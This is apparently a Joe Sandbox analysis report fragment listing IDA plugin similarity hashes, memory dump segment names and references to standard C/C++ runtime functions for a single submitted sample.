                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b231405a78ef3ce4fdc6013ff621c3d8bf21238fd61fe39e917e6f167fad45b2
                                  • Instruction ID: 7e13ae58cd3f5952bda987674f4c7dab4b214d45e0f20e38f42e0b05a72ec561
                                  • Opcode Fuzzy Hash: b231405a78ef3ce4fdc6013ff621c3d8bf21238fd61fe39e917e6f167fad45b2
                                  • Instruction Fuzzy Hash: DF210172608356EBC300AF15C98191AF7B2BFC8710F61C91DF8990B301D7B1A8118B82
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: _strrchr
                                  • String ID:
                                  • API String ID: 3213747228-0
                                  • Opcode ID: aa5b49d0e479a74df014bce19108996e6805c71859ec1d74824b40d9d29efc22
                                  • Instruction ID: 9ccbf5bd609cf798fdf5a6b1eb81107f3edad1278b55e32e912402d71f219c1f
                                  • Opcode Fuzzy Hash: aa5b49d0e479a74df014bce19108996e6805c71859ec1d74824b40d9d29efc22
                                  • Instruction Fuzzy Hash: 0AB18932A002599FDB118F68CC82BEE7BA5FF15358F164165E904EF282D774D981C7A1
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00857307
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0085730F
                                  • _ValidateLocalCookies.LIBCMT ref: 00857398
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 008573C3
                                  • _ValidateLocalCookies.LIBCMT ref: 00857418
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 065e0b2fdf4ea7acda622ef9c4e281cd64babd3814721e94ffc32678ce9810c5
                                  • Instruction ID: fa5aa40126e522e0daf14a19282774c388206a33bb71d3d1099effa1690aa918
                                  • Opcode Fuzzy Hash: 065e0b2fdf4ea7acda622ef9c4e281cd64babd3814721e94ffc32678ce9810c5
                                  • Instruction Fuzzy Hash: 7A41B130A04219DBCF10DF68D885AAEBBA5FF44329F54C095EC18EB352D7319909DB92
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0083D28A
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0083D2AC
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0083D2D4
                                  • __Getcoll.LIBCPMT ref: 0083D39F
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0083D40E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
                                  • String ID:
                                  • API String ID: 2318601406-0
                                  • Opcode ID: 2207d5e4288a5fb29686d6f4c284a309694ca6f93972343623ff990304315654
                                  • Instruction ID: 68ac3d2127073e25cfc06ce7b8a49f3ec1a239c80224cf6bc90d3ddae1be1df8
                                  • Opcode Fuzzy Hash: 2207d5e4288a5fb29686d6f4c284a309694ca6f93972343623ff990304315654
                                  • Instruction Fuzzy Hash: D8516AB1801248DFDB11DF98E5447AEBBB4FF41314F248059E815AB391DB79AE09CBE2
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0083A09D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0083A0BF
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0083A0E7
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0083A223
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  • Opcode ID: 9fe6e2c5e8d435285bd1905d3685fd78019a9186e03ccd8f1501a2d4cd43d912
                                  • Instruction ID: 0c41f078e85025871d06da8bd9e9c9acdd88e53e2a3755d5875fe3b3cc802222
                                  • Opcode Fuzzy Hash: 9fe6e2c5e8d435285bd1905d3685fd78019a9186e03ccd8f1501a2d4cd43d912
                                  • Instruction Fuzzy Hash: D45198B0D01249DBCB25CF98C9417AEBBF0FF12714F148158D895AB391EB75AA48CBD2
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0083C45A
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0083C47C
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0083C4A4
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0083C5C4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd
                                  Similarity
                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                  • String ID:
                                  • API String ID: 593203224-0
                                  • Opcode ID: 5d5fe9f993740efe5a8205fe5ee9e8438bd6728f60b03222497b48f94cdf9ced
                                  • Instruction ID: 4b7a3c2d6c30e88c18773ece701c016eda0f74e421206734af4a842452366167
                                  • Opcode Fuzzy Hash: 5d5fe9f993740efe5a8205fe5ee9e8438bd6728f60b03222497b48f94cdf9ced
                                  • Instruction Fuzzy Hash: 2951A9B0901258DBDB21DF58C844BAEBBF0FF42314F248198E845AB381DB75AA09CBD1
                                  APIs
                                  • __EH_prolog3.LIBCMT ref: 00852730
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0085273B
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 008527A9
                                    • Part of subcall function 0085288C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 008528A4
